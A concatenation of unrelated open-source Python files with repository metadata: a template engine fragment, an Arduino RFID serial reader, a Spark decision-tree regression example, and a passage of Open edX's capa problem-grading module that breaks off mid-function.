self.elements.clear()
self.load_modules()
store = Element.__subclasses__()
while store:
cls = store.pop(0)
store.extend(cls.__subclasses__())
name = cls.__name__.lower()
if not name.startswith("_") and not cls.abstract:
self.elements[name] = cls
def abspath(self, path_name):
return os.path.join(self.base_dir, path_name)
def get_template_path(self, name):
path = self.abspath(name)
return path
def is_tag(self, node):
return isinstance(node.tag, six.string_types)
def get_xml_root(self, path_name):
path = self.get_template_path(path_name)
return ET.parse(path).getroot()
def get_html(self, path_name, pretty_print=False):
try:
tree = self.get_xml_root(path_name)
except (OSError, IOError):
raise TemplateNotFound(path_name)
ctx = Context(self, tree, path_name)
content = ctx.render()
if pretty_print:
try:
return ET.tostring(ET.fromstring(content), pretty_print=True, method="html", encoding="unicode")
except TypeError:
raise TypeError("pretty_print option is supported only when lxml is installed")
return content
@staticmethod
def make_node(tag, attrib):
return ET.Element(tag, attrib)
def make_static_url(self, path):
return parse.urljoin(self.static_url, path)
def find_static(self, name):
name = name.strip("/")
for dir_ in self.static_dirs:
filename = os.path.join(dir_, name)
if os.path.isfile(filename):
return filename
class Context(object):
def __init__(self, env, root, path_name):
self.env = env
self.root = root
self.path_name = path_name
self.deps = set()
def get_asset_tags(self):
mgr = AssetManager(self.deps, self)
return mgr.get_tags()
def find_node(self, id, node=None):
for parent, child in self.iter_nodes(node):
if id == child.get("id"):
return child
def iter_nodes(self, node=None):
if node is None:
node = self.root
store = [(node, c) for c in node]
while store:
parent, child = store.pop(0)
yield parent, child
for c in child:
store.append((child, c))
@staticmethod
def replace_node(parent, child, node):
index = list(parent).index(child)
parent.remove(child)
parent.insert(index, node)
def is_tag(self, node):
return self.env.is_tag(node)
def get_xml_root(self, path):
return self.env.get_xml_root(path)
def get_element_class(self, node):
return self.env.elements[node.tag]
def make_element(self, node):
try:
return self.get_element_class(node)(node, self)
except KeyError:
raise InvalidTag(node, "Invalid tag")
def make_node(self, *args, **kwargs):
return self.env.make_node(*args, **kwargs)
def require(self, *packages):
for package in packages:
if not isinstance(package, Sequence):
package = [package]
for p in package:
self.deps.add(p)
def render(self):
el = self.make_element(self.root)
return el.render()
def find_static(self, *args, **kwargs):
return self.env.find_static(*args, **kwargs)
def make_static_url(self, *args, **kwargs):
return self.env.make_static_url(*args, **kwargs)
|
Labas-Vakaras/Smart_City
|
refs/heads/master
|
rfid-arduino/ComArduino.py
|
1
|
#======================================
import serial
import time
import webbrowser
print
print
# NOTE the user must ensure that the serial port and baudrate are correct
serPort = "/dev/ttyAMC0"
baudRate = 9600
ser = serial.Serial("/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_64032373933351B070D0-if00", baudRate, timeout=3.0)
print "Serial port " + serPort + " opened Baudrate " + str(baudRate)
while True:
line = ser.readline()
if line != "":
print line
webbrowser.open('http://155.254.33.123:8082/item/report?id='+line, new=2)
break
ser.close
|
srowen/spark
|
refs/heads/master
|
examples/src/main/python/mllib/decision_tree_regression_example.py
|
27
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Decision Tree Regression Example.
"""
from pyspark import SparkContext
# $example on$
from pyspark.mllib.tree import DecisionTree, DecisionTreeModel
from pyspark.mllib.util import MLUtils
# $example off$
if __name__ == "__main__":
sc = SparkContext(appName="PythonDecisionTreeRegressionExample")
# $example on$
# Load and parse the data file into an RDD of LabeledPoint.
data = MLUtils.loadLibSVMFile(sc, 'data/mllib/sample_libsvm_data.txt')
# Split the data into training and test sets (30% held out for testing)
(trainingData, testData) = data.randomSplit([0.7, 0.3])
# Train a DecisionTree model.
# Empty categoricalFeaturesInfo indicates all features are continuous.
model = DecisionTree.trainRegressor(trainingData, categoricalFeaturesInfo={},
impurity='variance', maxDepth=5, maxBins=32)
# Evaluate model on test instances and compute test error
predictions = model.predict(testData.map(lambda x: x.features))
labelsAndPredictions = testData.map(lambda lp: lp.label).zip(predictions)
testMSE = labelsAndPredictions.map(lambda lp: (lp[0] - lp[1]) * (lp[0] - lp[1])).sum() /\
float(testData.count())
print('Test Mean Squared Error = ' + str(testMSE))
print('Learned regression tree model:')
print(model.toDebugString())
# Save and load model
model.save(sc, "target/tmp/myDecisionTreeRegressionModel")
sameModel = DecisionTreeModel.load(sc, "target/tmp/myDecisionTreeRegressionModel")
# $example off$
|
antonve/s4-project-mooc
|
refs/heads/master
|
common/lib/capa/capa/responsetypes.py
|
17
|
#
# File: courseware/capa/responsetypes.py
#
"""
Problem response evaluation. Handles checking of student responses,
of a variety of types.
Used by capa_problem.py
"""
# standard library imports
import abc
import cgi
import inspect
import json
import logging
import html5lib
import numbers
import numpy
import os
from pyparsing import ParseException
import sys
import random
import re
import requests
import subprocess
import textwrap
import traceback
import xml.sax.saxutils as saxutils
from cmath import isnan
from sys import float_info
from collections import namedtuple
from shapely.geometry import Point, MultiPoint
import dogstats_wrapper as dog_stats_api
# specific library imports
from calc import evaluator, UndefinedVariable
from . import correctmap
from .registry import TagRegistry
from datetime import datetime
from pytz import UTC
from .util import (
compare_with_tolerance, contextualize_text, convert_files_to_filenames,
is_list_of_files, find_with_default, default_tolerance
)
from lxml import etree
from lxml.html.soupparser import fromstring as fromstring_bs # uses Beautiful Soup!!! FIXME?
import capa.xqueue_interface as xqueue_interface
import capa.safe_exec as safe_exec
log = logging.getLogger(__name__)
registry = TagRegistry()
CorrectMap = correctmap.CorrectMap # pylint: disable=invalid-name
CORRECTMAP_PY = None
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
#-----------------------------------------------------------------------------
# Exceptions
class LoncapaProblemError(Exception):
"""
Error in specification of a problem
"""
pass
class ResponseError(Exception):
"""
Error for failure in processing a response, including
exceptions that occur when executing a custom script.
"""
pass
class StudentInputError(Exception):
"""
Error for an invalid student input.
For example, submitting a string when the problem expects a number
"""
pass
#-----------------------------------------------------------------------------
#
# Main base class for CAPA responsetypes
class LoncapaResponse(object):
"""
Base class for CAPA responsetypes. Each response type (ie a capa question,
which is part of a capa problem) is represented as a subclass,
which should provide the following methods:
- get_score : evaluate the given student answers, and return a CorrectMap
- get_answers : provide a dict of the expected answers for this problem
Each subclass must also define the following attributes:
- tags : xhtml tags identifying this response (used in auto-registering)
In addition, these methods are optional:
- setup_response : find and note the answer input field IDs for the response; called
by __init__
- check_hint_condition : check to see if the student's answers satisfy a particular
condition for a hint to be displayed
- render_html : render this Response as HTML (must return XHTML-compliant string)
- __unicode__ : unicode representation of this Response
Each response type may also specify the following attributes:
- max_inputfields : (int) maximum number of answer input fields (checked in __init__
if not None)
- allowed_inputfields : list of allowed input fields (each a string) for this Response
- required_attributes : list of required attributes (each a string) on the main
response XML stanza
- hint_tag : xhtml tag identifying hint associated with this response inside
hintgroup
"""
__metaclass__ = abc.ABCMeta # abc = Abstract Base Class
tags = None
hint_tag = None
max_inputfields = None
allowed_inputfields = []
required_attributes = []
def __init__(self, xml, inputfields, context, system):
"""
Init is passed the following arguments:
- xml : ElementTree of this Response
- inputfields : ordered list of ElementTrees for each input entry field in this Response
- context : script processor context
- system : LoncapaSystem instance which provides OS, rendering, and user context
"""
self.xml = xml
self.inputfields = inputfields
self.context = context
self.capa_system = system
self.id = xml.get('id')
# The LoncapaProblemError messages here do not need to be translated as they are
# only displayed to the user when settings.DEBUG is True
for abox in inputfields:
if abox.tag not in self.allowed_inputfields:
msg = "%s: cannot have input field %s" % (
unicode(self), abox.tag)
msg += "\nSee XML source line %s" % getattr(
xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
if self.max_inputfields and len(inputfields) > self.max_inputfields:
msg = "%s: cannot have more than %s input fields" % (
unicode(self), self.max_inputfields)
msg += "\nSee XML source line %s" % getattr(
xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
for prop in self.required_attributes:
if not xml.get(prop):
msg = "Error in problem specification: %s missing required attribute %s" % (
unicode(self), prop)
msg += "\nSee XML source line %s" % getattr(
xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
# ordered list of answer_id values for this response
self.answer_ids = [x.get('id') for x in self.inputfields]
if self.max_inputfields == 1:
# for convenience
self.answer_id = self.answer_ids[0]
# map input_id -> maxpoints
self.maxpoints = dict()
for inputfield in self.inputfields:
# By default, each answerfield is worth 1 point
maxpoints = inputfield.get('points', '1')
self.maxpoints.update({inputfield.get('id'): int(maxpoints)})
# dict for default answer map (provided in input elements)
self.default_answer_map = {}
for entry in self.inputfields:
answer = entry.get('correct_answer')
if answer:
self.default_answer_map[entry.get(
'id')] = contextualize_text(answer, self.context)
if hasattr(self, 'setup_response'):
self.setup_response()
def get_max_score(self):
"""
Return the total maximum points of all answer fields under this Response
"""
return sum(self.maxpoints.values())
def render_html(self, renderer, response_msg=''):
"""
Return XHTML Element tree representation of this Response.
Arguments:
- renderer : procedure which produces HTML given an ElementTree
- response_msg: a message displayed at the end of the Response
"""
# render ourself as a <span> + our content
tree = etree.Element('span')
# problem author can make this span display:inline
if self.xml.get('inline', ''):
tree.set('class', 'inline')
for item in self.xml:
# call provided procedure to do the rendering
item_xhtml = renderer(item)
if item_xhtml is not None:
tree.append(item_xhtml)
tree.tail = self.xml.tail
# Add a <div> for the message at the end of the response
if response_msg:
tree.append(self._render_response_msg_html(response_msg))
return tree
def evaluate_answers(self, student_answers, old_cmap):
"""
Called by capa_problem.LoncapaProblem to evaluate student answers, and to
generate hints (if any).
Returns the new CorrectMap, with (correctness,msg,hint,hintmode) for each answer_id.
"""
new_cmap = self.get_score(student_answers)
self.get_hints(convert_files_to_filenames(
student_answers), new_cmap, old_cmap)
# log.debug('new_cmap = %s' % new_cmap)
return new_cmap
def get_hints(self, student_answers, new_cmap, old_cmap):
"""
Generate adaptive hints for this problem based on student answers, the old CorrectMap,
and the new CorrectMap produced by get_score.
Does not return anything.
Modifies new_cmap, by adding hints to answer_id entries as appropriate.
"""
hintgroup = self.xml.find('hintgroup')
if hintgroup is None:
return
# hint specified by function?
hintfn = hintgroup.get('hintfn')
if hintfn:
# Hint is determined by a function defined in the <script> context; evaluate
# that function to obtain list of hint, hintmode for each answer_id.
# The function should take arguments (answer_ids, student_answers, new_cmap, old_cmap)
# and it should modify new_cmap as appropriate.
# We may extend this in the future to add another argument which provides a
# callback procedure to a social hint generation system.
global CORRECTMAP_PY
if CORRECTMAP_PY is None:
# We need the CorrectMap code for hint functions. No, this is not great.
CORRECTMAP_PY = inspect.getsource(correctmap)
code = (
CORRECTMAP_PY + "\n" +
self.context['script_code'] + "\n" +
textwrap.dedent("""
new_cmap = CorrectMap()
new_cmap.set_dict(new_cmap_dict)
old_cmap = CorrectMap()
old_cmap.set_dict(old_cmap_dict)
{hintfn}(answer_ids, student_answers, new_cmap, old_cmap)
new_cmap_dict.update(new_cmap.get_dict())
old_cmap_dict.update(old_cmap.get_dict())
""").format(hintfn=hintfn)
)
globals_dict = {
'answer_ids': self.answer_ids,
'student_answers': student_answers,
'new_cmap_dict': new_cmap.get_dict(),
'old_cmap_dict': old_cmap.get_dict(),
}
try:
safe_exec.safe_exec(
code,
globals_dict,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
_ = self.capa_system.i18n.ugettext
msg = _('Error {err} in evaluating hint function {hintfn}.').format(err=err, hintfn=hintfn)
sourcenum = getattr(self.xml, 'sourceline', _('(Source code line unavailable)'))
msg += "\n" + _("See XML source line {sourcenum}.").format(sourcenum=sourcenum)
raise ResponseError(msg)
new_cmap.set_dict(globals_dict['new_cmap_dict'])
return
# hint specified by conditions and text dependent on conditions (a-la Loncapa design)
# see http://help.loncapa.org/cgi-bin/fom?file=291
#
# Example:
#
# <formularesponse samples="x@-5:5#11" id="11" answer="$answer">
# <textline size="25" />
# <hintgroup>
# <formulahint samples="x@-5:5#11" answer="$wrongans" name="inversegrad"></formulahint>
# <hintpart on="inversegrad">
# <text>You have inverted the slope in the question. The slope is
# (y2-y1)/(x2 - x1) you have the slope as (x2-x1)/(y2-y1).</text>
# </hintpart>
# </hintgroup>
# </formularesponse>
if (self.hint_tag is not None
and hintgroup.find(self.hint_tag) is not None
and hasattr(self, 'check_hint_condition')):
rephints = hintgroup.findall(self.hint_tag)
hints_to_show = self.check_hint_condition(
rephints, student_answers)
# can be 'on_request' or 'always' (default)
hintmode = hintgroup.get('mode', 'always')
for hintpart in hintgroup.findall('hintpart'):
if hintpart.get('on') in hints_to_show:
hint_text = hintpart.find('text').text
# make the hint appear after the last answer box in this
# response
aid = self.answer_ids[-1]
new_cmap.set_hint_and_mode(aid, hint_text, hintmode)
log.debug('after hint: new_cmap = %s', new_cmap)
@abc.abstractmethod
def get_score(self, student_answers):
"""
Return a CorrectMap for the answers expected vs given. This includes
(correctness, npoints, msg) for each answer_id.
Arguments:
- student_answers : dict of (answer_id, answer) where answer = student input (string)
"""
pass
@abc.abstractmethod
def get_answers(self):
"""
Return a dict of (answer_id, answer_text) for each answer for this question.
"""
pass
def check_hint_condition(self, hxml_set, student_answers):
"""
Return a list of hints to show.
- hxml_set : list of Element trees, each specifying a condition to be
satisfied for a named hint condition
- student_answers : dict of student answers
Returns a list of names of hint conditions which were satisfied. Those are used
to determine which hints are displayed.
"""
pass
def setup_response(self):
pass
def __unicode__(self):
return u'LoncapaProblem Response %s' % self.xml.tag
def _render_response_msg_html(self, response_msg):
""" Render a <div> for a message that applies to the entire response.
*response_msg* is a string, which may contain XHTML markup
Returns an etree element representing the response message <div> """
# First try wrapping the text in a <div> and parsing
# it as an XHTML tree
try:
response_msg_div = etree.XML('<div>%s</div>' % str(response_msg))
# If we can't do that, create the <div> and set the message
# as the text of the <div>
except:
response_msg_div = etree.Element('div')
response_msg_div.text = str(response_msg)
# Set the css class of the message <div>
response_msg_div.set("class", "response_message")
return response_msg_div
# These accessor functions allow polymorphic checking of response
# objects without having to call hasattr() directly.
def has_mask(self):
"""True if the response has masking."""
return hasattr(self, '_has_mask')
def has_shuffle(self):
"""True if the response has a shuffle transformation."""
return hasattr(self, '_has_shuffle')
def has_answerpool(self):
"""True if the response has an answer-pool transformation."""
return hasattr(self, '_has_answerpool')
#-----------------------------------------------------------------------------
@registry.register
class JavascriptResponse(LoncapaResponse):
"""
This response type is used when the student's answer is graded via
Javascript using Node.js.
"""
human_name = _('JavaScript Input')
tags = ['javascriptresponse']
max_inputfields = 1
allowed_inputfields = ['javascriptinput']
def setup_response(self):
# Sets up generator, grader, display, and their dependencies.
self.parse_xml()
self.compile_display_javascript()
self.params = self.extract_params()
if self.generator:
self.problem_state = self.generate_problem_state()
else:
self.problem_state = None
self.solution = None
self.prepare_inputfield()
def compile_display_javascript(self):
# TODO FIXME
# arjun: removing this behavior for now (and likely forever). Keeping
# until we decide on exactly how to solve this issue. For now, files are
# manually being compiled to DATA_DIR/js/compiled.
# latestTimestamp = 0
# basepath = self.capa_system.filestore.root_path + '/js/'
# for filename in (self.display_dependencies + [self.display]):
# filepath = basepath + filename
# timestamp = os.stat(filepath).st_mtime
# if timestamp > latestTimestamp:
# latestTimestamp = timestamp
#
# h = hashlib.md5()
# h.update(self.answer_id + str(self.display_dependencies))
# compiled_filename = 'compiled/' + h.hexdigest() + '.js'
# compiled_filepath = basepath + compiled_filename
# if not os.path.exists(compiled_filepath) or os.stat(compiled_filepath).st_mtime < latestTimestamp:
# outfile = open(compiled_filepath, 'w')
# for filename in (self.display_dependencies + [self.display]):
# filepath = basepath + filename
# infile = open(filepath, 'r')
# outfile.write(infile.read())
# outfile.write(';\n')
# infile.close()
# outfile.close()
# TODO this should also be fixed when the above is fixed.
filename = self.capa_system.ajax_url.split('/')[-1] + '.js'
self.display_filename = 'compiled/' + filename
def parse_xml(self):
self.generator_xml = self.xml.xpath('//*[@id=$id]//generator',
id=self.xml.get('id'))[0]
self.grader_xml = self.xml.xpath('//*[@id=$id]//grader',
id=self.xml.get('id'))[0]
self.display_xml = self.xml.xpath('//*[@id=$id]//display',
id=self.xml.get('id'))[0]
self.xml.remove(self.generator_xml)
self.xml.remove(self.grader_xml)
self.xml.remove(self.display_xml)
self.generator = self.generator_xml.get("src")
self.grader = self.grader_xml.get("src")
self.display = self.display_xml.get("src")
if self.generator_xml.get("dependencies"):
self.generator_dependencies = self.generator_xml.get(
"dependencies").split()
else:
self.generator_dependencies = []
if self.grader_xml.get("dependencies"):
self.grader_dependencies = self.grader_xml.get(
"dependencies").split()
else:
self.grader_dependencies = []
if self.display_xml.get("dependencies"):
self.display_dependencies = self.display_xml.get(
"dependencies").split()
else:
self.display_dependencies = []
self.display_class = self.display_xml.get("class")
def get_node_env(self):
js_dir = os.path.join(self.capa_system.filestore.root_path, 'js')
tmp_env = os.environ.copy()
node_path = self.capa_system.node_path + ":" + os.path.normpath(js_dir)
tmp_env["NODE_PATH"] = node_path
return tmp_env
def call_node(self, args):
# Node.js code is un-sandboxed. If the LoncapaSystem says we aren't
# allowed to run unsafe code, then stop now.
if not self.capa_system.can_execute_unsafe_code():
_ = self.capa_system.i18n.ugettext
msg = _("Execution of unsafe Javascript code is not allowed.")
raise LoncapaProblemError(msg)
subprocess_args = ["node"]
subprocess_args.extend(args)
return subprocess.check_output(subprocess_args, env=self.get_node_env())
def generate_problem_state(self):
generator_file = os.path.dirname(os.path.normpath(
__file__)) + '/javascript_problem_generator.js'
output = self.call_node([generator_file,
self.generator,
json.dumps(self.generator_dependencies),
json.dumps(str(self.context['seed'])),
json.dumps(self.params)]).strip()
return json.loads(output)
def extract_params(self):
params = {}
for param in self.xml.xpath('//*[@id=$id]//responseparam',
id=self.xml.get('id')):
raw_param = param.get("value")
params[param.get("name")] = json.loads(
contextualize_text(raw_param, self.context))
return params
def prepare_inputfield(self):
for inputfield in self.xml.xpath('//*[@id=$id]//javascriptinput',
id=self.xml.get('id')):
escapedict = {'"': '"'}
encoded_params = json.dumps(self.params)
encoded_params = saxutils.escape(encoded_params, escapedict)
inputfield.set("params", encoded_params)
encoded_problem_state = json.dumps(self.problem_state)
encoded_problem_state = saxutils.escape(encoded_problem_state,
escapedict)
inputfield.set("problem_state", encoded_problem_state)
inputfield.set("display_file", self.display_filename)
inputfield.set("display_class", self.display_class)
def get_score(self, student_answers):
json_submission = student_answers[self.answer_id]
(all_correct, evaluation, solution) = self.run_grader(json_submission)
self.solution = solution
correctness = 'correct' if all_correct else 'incorrect'
if all_correct:
points = self.get_max_score()
else:
points = 0
return CorrectMap(self.answer_id, correctness, npoints=points, msg=evaluation)
def run_grader(self, submission):
if submission is None or submission == '':
submission = json.dumps(None)
grader_file = os.path.dirname(os.path.normpath(
__file__)) + '/javascript_problem_grader.js'
outputs = self.call_node([grader_file,
self.grader,
json.dumps(self.grader_dependencies),
submission,
json.dumps(self.problem_state),
json.dumps(self.params)]).split('\n')
all_correct = json.loads(outputs[0].strip())
evaluation = outputs[1].strip()
solution = outputs[2].strip()
return (all_correct, evaluation, solution)
def get_answers(self):
if self.solution is None:
(_, _, self.solution) = self.run_grader(None)
return {self.answer_id: self.solution}
#-----------------------------------------------------------------------------
@registry.register
class ChoiceResponse(LoncapaResponse):
"""
This response type is used when the student chooses from a discrete set of
choices. Currently, to be marked correct, all "correct" choices must be
supplied by the student, and no extraneous choices may be included.
This response type allows for two inputtypes: radiogroups and checkbox
groups. radiogroups are used when the student should select a single answer,
and checkbox groups are used when the student may supply 0+ answers.
Note: it is suggested to include a "None of the above" choice when no
answer is correct for a checkboxgroup inputtype; this ensures that a student
must actively mark something to get credit.
If two choices are marked as correct with a radiogroup, the student will
have no way to get the answer right.
TODO: Allow for marking choices as 'optional' and 'required', which would
not penalize a student for including optional answers and would also allow
for questions in which the student can supply one out of a set of correct
answers.This would also allow for survey-style questions in which all
answers are correct.
Example:
<choiceresponse>
<radiogroup>
<choice correct="false">
<text>This is a wrong answer.</text>
</choice>
<choice correct="true">
<text>This is the right answer.</text>
</choice>
<choice correct="false">
<text>This is another wrong answer.</text>
</choice>
</radiogroup>
</choiceresponse>
In the above example, radiogroup can be replaced with checkboxgroup to allow
the student to select more than one choice.
TODO: In order for the inputtypes to render properly, this response type
must run setup_response prior to the input type rendering. Specifically, the
choices must be given names. This behavior seems like a leaky abstraction,
and it'd be nice to change this at some point.
"""
human_name = _('Checkboxes')
tags = ['choiceresponse']
max_inputfields = 1
allowed_inputfields = ['checkboxgroup', 'radiogroup']
correct_choices = None
def setup_response(self):
self.assign_choice_names()
correct_xml = self.xml.xpath('//*[@id=$id]//choice[@correct="true"]',
id=self.xml.get('id'))
self.correct_choices = set([choice.get(
'name') for choice in correct_xml])
def assign_choice_names(self):
"""
Initialize name attributes in <choice> tags for this response.
"""
for index, choice in enumerate(self.xml.xpath('//*[@id=$id]//choice',
id=self.xml.get('id'))):
choice.set("name", "choice_" + str(index))
def get_score(self, student_answers):
student_answer = student_answers.get(self.answer_id, [])
if not isinstance(student_answer, list):
student_answer = [student_answer]
no_empty_answer = student_answer != []
student_answer = set(student_answer)
required_selected = len(self.correct_choices - student_answer) == 0
no_extra_selected = len(student_answer - self.correct_choices) == 0
correct = required_selected & no_extra_selected & no_empty_answer
if correct:
return CorrectMap(self.answer_id, 'correct')
else:
return CorrectMap(self.answer_id, 'incorrect')
def get_answers(self):
return {self.answer_id: list(self.correct_choices)}
#-----------------------------------------------------------------------------
@registry.register
class MultipleChoiceResponse(LoncapaResponse):
"""
Multiple Choice Response
The shuffle and answer-pool features on this class enable permuting and
subsetting the choices shown to the student.
Both features enable name "masking":
With masking, the regular names of multiplechoice choices
choice_0 choice_1 ... are not used. Instead we use random masked names
mask_2 mask_0 ... so that a view-source of the names reveals nothing about
the original order. We introduce the masked names right at init time, so the
whole software stack works with just the one system of naming.
The .has_mask() test on a response checks for masking, implemented by a
._has_mask attribute on the response object.
The logging functionality in capa_base calls the unmask functions here
to translate back to choice_0 name style for recording in the logs, so
the logging is in terms of the regular names.
"""
# TODO: handle direction and randomize
human_name = _('Multiple Choice')
tags = ['multiplechoiceresponse']
max_inputfields = 1
allowed_inputfields = ['choicegroup']
correct_choices = None
def setup_response(self):
# call secondary setup for MultipleChoice questions, to set name
# attributes
self.mc_setup_response()
# define correct choices (after calling secondary setup)
xml = self.xml
cxml = xml.xpath('//*[@id=$id]//choice', id=xml.get('id'))
# contextualize correct attribute and then select ones for which
# correct = "true"
self.correct_choices = [
contextualize_text(choice.get('name'), self.context)
for choice in cxml
if contextualize_text(choice.get('correct'), self.context) == "true"
]
def mc_setup_response(self):
"""
Initialize name attributes in <choice> stanzas in the <choicegroup> in this response.
Masks the choice names if applicable.
"""
i = 0
for response in self.xml.xpath("choicegroup"):
# Is Masking enabled? -- check for shuffle or answer-pool features
ans_str = response.get("answer-pool")
# Masking (self._has_mask) is off, to be re-enabled with a future PR.
rtype = response.get('type')
if rtype not in ["MultipleChoice"]:
# force choicegroup to be MultipleChoice if not valid
response.set("type", "MultipleChoice")
for choice in list(response):
# The regular, non-masked name:
if choice.get("name") is not None:
name = "choice_" + choice.get("name")
else:
name = "choice_" + str(i)
i += 1
# If using the masked name, e.g. mask_0, save the regular name
# to support unmasking later (for the logs).
if self.has_mask():
mask_name = "mask_" + str(mask_ids.pop())
self._mask_dict[mask_name] = name
choice.set("name", mask_name)
else:
choice.set("name", name)
def late_transforms(self, problem):
"""
Rearrangements run late in the __init__ process.
Cannot do these at response init time, as not enough
other stuff exists at that time.
"""
self.do_shuffle(self.xml, problem)
self.do_answer_pool(self.xml, problem)
def get_score(self, student_answers):
"""
grade student response.
"""
# log.debug('%s: student_answers=%s, correct_choices=%s' % (
# unicode(self), student_answers, self.correct_choices))
if (self.answer_id in student_answers
and student_answers[self.answer_id] in self.correct_choices):
return CorrectMap(self.answer_id, 'correct')
else:
return CorrectMap(self.answer_id, 'incorrect')
def get_answers(self):
return {self.answer_id: self.correct_choices}
def unmask_name(self, name):
"""
Given a masked name, e.g. mask_2, returns the regular name, e.g. choice_0.
Fails with LoncapaProblemError if called on a response that is not masking.
"""
if not self.has_mask():
_ = self.capa_system.i18n.ugettext
# Translators: 'unmask_name' is a method name and should not be translated.
msg = _("unmask_name called on response that is not masked")
raise LoncapaProblemError(msg)
return self._mask_dict[name]
def unmask_order(self):
"""
Returns a list of the choice names in the order displayed to the user,
using the regular (non-masked) names.
"""
# With masking disabled, this computation remains interesting to see
# the displayed order, even though there is no unmasking.
choices = self.xml.xpath('choicegroup/choice')
return [choice.get("name") for choice in choices]
def do_shuffle(self, tree, problem):
"""
For a choicegroup with shuffle="true", shuffles the choices in-place in the given tree
based on the seed. Otherwise does nothing.
Raises LoncapaProblemError if both shuffle and answer-pool are active:
a problem should use one or the other but not both.
Does nothing if the tree has already been processed.
"""
# The tree is already pared down to this <multichoiceresponse> so this query just
# gets the child choicegroup (i.e. no leading //)
choicegroups = tree.xpath('choicegroup[@shuffle="true"]')
if choicegroups:
choicegroup = choicegroups[0]
if choicegroup.get('answer-pool') is not None:
_ = self.capa_system.i18n.ugettext
# Translators: 'shuffle' and 'answer-pool' are attribute names and should not be translated.
msg = _("Do not use shuffle and answer-pool at the same time")
raise LoncapaProblemError(msg)
# Note in the response that shuffling is done.
# Both to avoid double-processing, and to feed the logs.
if self.has_shuffle():
return
self._has_shuffle = True # pylint: disable=attribute-defined-outside-init
# Move elements from tree to list for shuffling, then put them back.
ordering = list(choicegroup.getchildren())
for choice in ordering:
choicegroup.remove(choice)
ordering = self.shuffle_choices(ordering, self.get_rng(problem))
for choice in ordering:
choicegroup.append(choice)
def shuffle_choices(self, choices, rng):
"""
Returns a list of choice nodes with the shuffling done,
using the provided random number generator.
Choices with 'fixed'='true' are held back from the shuffle.
"""
# Separate out a list of the stuff to be shuffled
# vs. the head/tail of fixed==true choices to be held back from the shuffle.
# Rare corner case: A fixed==true choice "island" in the middle is lumped in
# with the tail group of fixed choices.
# Slightly tricky one-pass implementation using a state machine
head = []
middle = [] # only this one gets shuffled
tail = []
at_head = True
for choice in choices:
if at_head and choice.get('fixed') == 'true':
head.append(choice)
continue
at_head = False
if choice.get('fixed') == 'true':
tail.append(choice)
else:
middle.append(choice)
rng.shuffle(middle)
return head + middle + tail
def get_rng(self, problem):
"""
Get the random number generator to be shared by responses
of the problem, creating it on the problem if needed.
"""
# Multiple questions in a problem share one random number generator (rng) object
# stored on the problem. If each question got its own rng, the structure of multiple
# questions within a problem could appear predictable to the student,
# e.g. (c) keeps being the correct choice. This is due to the seed being
# defined at the problem level, so the multiple rng's would be seeded the same.
# The name _shared_rng begins with an _ to suggest that it is not a facility
# for general use.
# pylint: disable=protected-access
if not hasattr(problem, '_shared_rng'):
problem._shared_rng = random.Random(self.context['seed'])
return problem._shared_rng
def do_answer_pool(self, tree, problem):
"""
Implements the answer-pool subsetting operation in-place on the tree.
Allows for problem questions with a pool of answers, from which answer options shown to the student
and randomly selected so that there is always 1 correct answer and n-1 incorrect answers,
where the author specifies n as the value of the attribute "answer-pool" within <choicegroup>
The <choicegroup> tag must have an attribute 'answer-pool' giving the desired
pool size. If that attribute is zero or not present, no operation is performed.
Calling this a second time does nothing.
Raises LoncapaProblemError if the answer-pool value is not an integer,
or if the number of correct or incorrect choices available is zero.
"""
choicegroups = tree.xpath("choicegroup[@answer-pool]")
if choicegroups:
choicegroup = choicegroups[0]
num_str = choicegroup.get('answer-pool')
if num_str == '0':
return
try:
num_choices = int(num_str)
except ValueError:
_ = self.capa_system.i18n.ugettext
# Translators: 'answer-pool' is an attribute name and should not be translated.
msg = _("answer-pool value should be an integer")
raise LoncapaProblemError(msg)
# Note in the response that answerpool is done.
# Both to avoid double-processing, and to feed the logs.
if self.has_answerpool():
return
self._has_answerpool = True # pylint: disable=attribute-defined-outside-init
choices_list = list(choicegroup.getchildren())
# Remove all choices in the choices_list (we will add some back in later)
for choice in choices_list:
choicegroup.remove(choice)
rng = self.get_rng(problem) # random number generator to use
# Sample from the answer pool to get the subset choices and solution id
(solution_id, subset_choices) = self.sample_from_answer_pool(choices_list, rng, num_choices)
# Add back in randomly selected choices
for choice in subset_choices:
choicegroup.append(choice)
# Filter out solutions that don't correspond to the correct answer we selected to show
# Note that this means that if the user simply provides a <solution> tag, nothing is filtered
solutionset = choicegroup.xpath('../following-sibling::solutionset')
if len(solutionset) != 0:
solutionset = solutionset[0]
solutions = solutionset.xpath('./solution')
for solution in solutions:
if solution.get('explanation-id') != solution_id:
solutionset.remove(solution)
def sample_from_answer_pool(self, choices, rng, num_pool):
"""
Takes in:
1. list of choices
2. random number generator
3. the requested size "answer-pool" number, in effect a max
Returns a tuple with 2 items:
1. the solution_id corresponding with the chosen correct answer
2. (subset) list of choice nodes with num-1 incorrect and 1 correct
Raises an error if the number of correct or incorrect choices is 0.
"""
correct_choices = []
incorrect_choices = []
for choice in choices:
if choice.get('correct') == 'true':
correct_choices.append(choice)
else:
incorrect_choices.append(choice)
# In my small test, capa seems to treat the absence of any correct=
# attribute as equivalent to ="false", so that's what we do here.
# We raise an error if the problem is highly ill-formed.
# There must be at least one correct and one incorrect choice.
# IDEA: perhaps this sort semantic-lint constraint should be generalized to all multichoice
# not just down in this corner when answer-pool is used.
# Or perhaps in the overall author workflow, these errors are unhelpful and
# should all be removed.
if len(correct_choices) < 1 or len(incorrect_choices) < 1:
_ = self.capa_system.i18n.ugettext
# Translators: 'Choicegroup' is an input type and should not be translated.
